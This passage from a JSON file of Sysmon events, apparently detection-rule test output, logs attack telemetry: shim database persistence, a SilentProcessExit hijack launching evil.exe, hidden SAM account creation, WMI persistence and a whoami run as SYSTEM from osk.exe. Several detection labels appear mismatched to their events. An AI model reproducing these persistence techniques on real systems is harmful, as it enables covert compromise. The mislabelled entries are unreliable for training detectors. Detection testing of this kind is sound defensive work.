20:52:25.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966429,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:25.933892Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-568A-5C91-0000-0010D24B0800","ProcessId":4072,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:26.194"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966444,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:26.364512Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-001012610800","ProcessId":2548,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.054"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966449,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.124363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-569F-5C91-0000-0010D96C0800","ProcessId":3140,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:52:47.364"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966464,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:52:47.474867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Users\\user01\\Desktop\\titi.sdb\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\user01\\Desktop\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-57EC-5C91-0000-001097810900","ProcessId":2848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 20:58:20.894"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966480,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:20.994444Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=0EBF71E33EF09CA65D9683AFA999C473,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-528D-5C91-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"c:\\osk.exe\" ","ParentImage":"C:\\osk.exe","ParentProcessGuid":"365ABB72-57FB-5C91-0000-00104FD40900","ParentProcessId":2128,"ProcessGuid":"365ABB72-5804-5C91-0000-001044DE0900","ProcessId":2456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-03-19 20:58:44.187"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966501,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:58:44.237867Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966533,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt","UtcTime":"2019-03-19 21:20:32.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966534,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:32.298766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-543D-5C91-0000-001099A60300","ProcessId":2984,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden","UtcTime":"2019-03-19 21:20:35.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966535,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:20:35.603518Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\"%%ProgramFiles%%\\Windows NT\\Accessories\\WORDPAD.EXE\" \"%%1\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106_CLASSES\\sdb_auto_file\\shell\\open\\command\\(Default)","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966543,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"WORDPAD.EXE","EventType":"SetValue","Image":"C:\\Windows\\system32\\rundll32.exe","ProcessGuid":"365ABB72-5D94-5C91-0000-001080E90F00","ProcessId":3840,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1587066498-1489273250-1035260531-1106\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.sdb\\OpenWithList\\a","UtcTime":"2019-03-19 21:22:33.182"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966544,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T21:22:33.202617Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-777F-5C91-0000-0010B95B0000","ProcessId":524,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 23:13:04.090"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966594,"Execution_attributes":{"ProcessID":988,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T23:18:50.627750Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 09:28:22.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134365,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T09:28:22.280355Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:03:04.489"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134385,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:03:04.489480Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\sqlsvc\\(Default)","UtcTime":"2020-09-04 10:33:31.842"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134399,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:33:31.843489Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 10:54:22.973"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134408,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T10:54:22.974353Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\windows\\system32\\lsass.exe","ProcessGuid":"00247C92-7509-5F4E-0B00-000000002A00","ProcessId":900,"RuleName":"Valid Account - Local Account Created or Deleted","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\support\\(Default)","UtcTime":"2020-09-04 11:00:24.601"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2134411,"Execution_attributes":{"ProcessID":5424,"ThreadID":6528},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-09-04T11:00:24.602530Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000200)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F5D-5D0A-0000-00109B331300","ProcessId":1356,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\GlobalFlag","UtcTime":"2019-06-19 17:22:41.709"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8034,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:41.709638Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F61-5D0A-0000-0010DB351300","ProcessId":2504,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\ReportingMode","UtcTime":"2019-06-19 17:22:43.912"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8036,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:43.944013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Persistence Mechanisms"],"event":{"Event":{"EventData":{"Details":"C:\\windows\\temp\\evil.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-6F63-5D0A-0000-0010F93A1300","ProcessId":1956,"RuleName":"Persistence via SilentProcessExit hijack","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe\\MonitorProcess","UtcTime":"2019-06-19 17:22:45.678"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":8038,"Execution_attributes":{"ProcessID":284,"ThreadID":2076},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-06-19T17:22:45.694013Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["WMI Event Consumer Created Named Pipe","WMI Persistence - Script Event Consumer File Write","WMI Persistence - Script Event Consumer"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wbem\\scrcons.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Standard Event Consumer - scripting","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=6AEC20B9D4C1AB6F1AB297F28EB6BF93,IMPHASH=CCEC86CC0D16062391CC627BC9466A62","Image":"C:\\Windows\\System32\\wbem\\scrcons.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-701F-5CA5-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-7020-5CA5-0000-0010ED6A0000","ParentProcessId":596,"ProcessGuid":"365ABB72-F76F-5CA4-0000-0010AA201700","ProcessId":2636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-04-03 18:11:59.996"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":1,"EventRecordID":7203,"Execution_attributes":{"ProcessID":1828,"ThreadID":372},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-03T18:12:00.016862Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\StartupNewHomeAddress","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-BFB2-5CED-0000-0010F2C03600","ProcessId":1520,"RuleName":"Persistence - Startup User Shell Folder Modified","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\startup","UtcTime":"2019-05-28 23:09:38.589"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6625,"Execution_attributes":{"ProcessID":2032,"ThreadID":2420},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-28T23:09:38.589832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Usage of Sysinternals Tools","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Desktop\\PsExec64.exe","ProcessGuid":"747F3D96-53D8-5D75-0000-00101811CD00","ProcessId":6868,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Sysinternals\\PsExec\\EulaAccepted","UtcTime":"2019-09-08 19:17:44.203"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":38292,"Execution_attributes":{"ProcessID":2956,"ThreadID":2088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-09-08T19:17:44.249169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-64F9-5D75-0000-001038560000","ProcessId":576,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\Start","UtcTime":"2019-09-08 